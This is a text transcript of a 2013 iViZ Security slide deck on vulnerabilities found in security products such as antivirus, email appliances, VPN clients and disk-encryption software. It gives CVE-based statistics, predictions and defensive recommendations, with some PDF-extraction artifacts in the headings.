insecurity in security products 2013
TRANSCRIPT
-
7/28/2019 Insecurity in Security Products 2013
1/21
iViZ Security Inc1May 2013
Bikash Barai, Co-Founder & CEO
Why Current Security Solutions Fail?
-
7/28/2019 Insecurity in Security Products 2013
2/21
iViZ Security Inc2May 2013
Introduction About iViZ
Cloud based Application Penetration Testing
Zero False Positive Guarantee
Business Logic Testing with 100% WASCcoverage
400+ customers. IDG Ventures Funded.
Gartner Hype Cycle mention
About myself Co-founder and CEO of iViZ Worked in areas of AI, Anti-spam filters, Multi
stage attack simulation etc
Love AI, Security, Entrepreneurship, Ma
gic/Mind Reading
-
7/28/2019 Insecurity in Security Products 2013
3/21
iViZ Security Inc3May 2013
Vulnerabilities in Security Products
-
7/28/2019 Insecurity in Security Products 2013
4/21
iViZ Security Inc4May 2013
Symantec EmailAppliance(9.5.x)
Description Rating
Out-of-band stored-XSS - delivered by email Critical
XSS (both reflective and stored) with session-hijacking
High
Easy CSRF to add a backdoor-administrator (for
example)
High
SSH with backdoor user account + privilegeescalation to root
High
Ability for an authenticated attacker to modify theWeb-application
High
Arbitrary file download was possible with a craftedURL
Medium
Unauthenticated detailed version disclosure Low
Credits: Brian Smith
-
7/28/2019 Insecurity in Security Products 2013
5/21
iViZ Security Inc5May 2013
Trend Email Appliance(8.2.0.X)
Description RatingOut-of-band stored-XSS in user-portal - deliveredvia email
Critical
XSS (both reflective and stored) with session-hijacking
High
Easy CSRF to add a backdoor-administrator (forexample)
High
Root shell via patch-upload feature(authenticated)
High
Blind LDAP-injection in user-portal login-screen High
Directory traversal (authenticated) Medium
Unauthenticated access to AdminUI logs Low
Unauthenticated version disclosure LowCredits: Brian Smith
-
7/28/2019 Insecurity in Security Products 2013
6/21
iViZ Security Inc6May 2013
Microsoft Auto-updateHijacking
MD5 collision attack to generate acounterfeit copy of a Microsoft
Terminal Server Licensing Service
certificate.
Used the counterfeit certificate tosign code such that malware
appeared like genuine Microsoft codeand hence remained undetected.
-
7/28/2019 Insecurity in Security Products 2013
7/21
iViZ Security Inc7May 2013
Preboot AuthenticationAttacks
iViZ identified flaws in numerous BIOSsand pre-boot authentication and diskencryption software
Bitlocker, TrueCrypt, Mcaffee Safeboot,DriveCryptor, Diskcryptor, LILO, GRUB, HPBios, Intel/Lenevo BIOS found to bevulnerable.
Flaws resulted in disclosure of plaintextpre-boot authentication passwords.
In some cases, an attacked could
bypass pre-boot authentication.
-
7/28/2019 Insecurity in Security Products 2013
8/21
iViZ Security Inc8May 2013
Vulnerabilities in Anti-Virus
Discovered by iViZ Security
Antivirus products process differenttypes of files having different file-formats.
We found flaws in handlingmalformed compressed, packed andbinary files in AVG, Sophos, Avast etc
Some of the file formats for which wefound flaws in AV products are
ISO, RPM, ELF, PE, UPX, LZH
-
7/28/2019 Insecurity in Security Products 2013
9/21
iViZ Security Inc9May 2013
More Vulnerabilities in AVproducts
Detection Bypass CVE-2012-1461: The Gzip file parser in
AVG Anti-Virus, Bitdefender, F-Secure ,
Fortinet antiviruses, allows remoteattackers to bypass malware detectionvia a .tar.gz file
Denial of Service (DoS)
CVE-2012-4014: Unspecifiedvulnerability in McAfee Email Anti-virus(formerly WebShield SMTP) allowsremote attackers to cause a denial of
service via unknown vectors.
-
7/28/2019 Insecurity in Security Products 2013
10/21
iViZ Security Inc10May 2013
Vulnerabilities in VPNproducts
Remote Code Execution CVE-2012-2493: Cisco AnyConnect
Secure Mobility Client 2.x does not
properly validate binaries that arereceived by the downloader process,which allows remote attackers toexecute arbitrary code.
CVE-2012-0646: Format stringvulnerability in VPN in Apple iOS before5.1 allows remote attackers to executearbitrary code via a crafted racoon
configuration file.
-
7/28/2019 Insecurity in Security Products 2013
11/21
iViZ Security Inc11May 2013
Report Findings
-
7/28/2019 Insecurity in Security Products 2013
12/21
iViZ Security Inc12May 2013
About the Report/Study
iViZ used databases such as theCommon Vulnerability Enumeration(CVE), Common Product Enumeration(CPE) and National VulnerabilityDatabase (NVD) for the Analysis
-
7/28/2019 Insecurity in Security Products 2013
13/21
iViZ Security Inc13May 2013
Key Findings
Vulnerabilities increasing at CAGR of 37.29% over the last 3Years.
Anti-Virus accounts for 49% of the vulnerabilities, next
Firewall (24%) Top 3 Security vendors with maximum vulnerabilities:
McAfee, Cisco followed by Symantec.
Top 3 Security products with maximum vulnerabilities:Rising-Globals Antivirus , Ciscos Adaptive Security
Appliance and Ikarus Virus Utilities. Access Control is the most prominent weakness in Security
Products followed by Input Validation.
SQL Injection is the least found vulnerability amongSecurity products
-
7/28/2019 Insecurity in Security Products 2013
14/21
iViZ Security Inc14May 2013
Vulnerability Trends
In All Products In Security Products
-
7/28/2019 Insecurity in Security Products 2013
15/21
iViZ Security Inc15May 2013
Vulnerability by Product Typesin 2012
t
-
7/28/2019 Insecurity in Security Products 2013
16/21
iViZ Security Inc16May 2013
u nera t es yVendors
-
7/28/2019 Insecurity in Security Products 2013
17/21
iViZ Security Inc17May 2013
-
7/28/2019 Insecurity in Security Products 2013
18/21
iViZ Security Inc18May 2013
Comparative Analysis
-
7/28/2019 Insecurity in Security Products 2013
19/21
iViZ Security Inc19May 2013
5 Predictions..
We predict an increase in attacks onsecurity products, companies orsolutions
APT and Cyber-warfare makes SecurityProducts as the next choice
Majority of vulnerabilities discoveredwill not become public and shall remainin the hands of APT actors
Security Products are High Pay-offtargets since they are present in mostsystems
More vulnerabilities would be sold inZero Day Black Market
-
7/28/2019 Insecurity in Security Products 2013
20/21
iViZ Security Inc20May 2013
What should we do to
protect us? Test and Dont Trust (blindly):Conduct proper due diligence of thesecurity product
Ask for audit reports
Patch security products like anyother product
Treat security tools in similar manneras other tools during threat modeling
Have proper detection andmonitorin solutions and multi-la er
-
7/28/2019 Insecurity in Security Products 2013
21/21
iViZ Security Inc21May 2013
Thank [email protected]
Blog: http://blog.ivizsecurity.com/Linkedin:
http://www.linkedin.com/pub/bikash-barai/0/7a4/669
Twitter: https://twitter.com/bikashbarai1DISCLAIMER
We have used well known vulnerability standards and database like Common Vulnerability Enumeration (CVE), Common Product Enumeration
(CPE) and Nation Vulnerability Database (NVD). One of the major challenges we faced was in classifying the products into security and non-
security products, as the current product standard (CPE) does not support it. We solved this challenge by considering that security products havecertain keywords like, IDvirus, firewall, IPS, scan etc. Hence there are chances of some date being missed and the report should be
considered as indicative. iViZ disclaims all warranties, expressed or implied, with respect to this research for any particular purpose.
mailto:[email protected]://blog.ivizsecurity.com/http://www.linkedin.com/pub/bikash-barai/0/7a4/669https://twitter.com/bikashbarai1https://twitter.com/bikashbarai1http://www.linkedin.com/pub/bikash-barai/0/7a4/669http://blog.ivizsecurity.com/mailto:[email protected]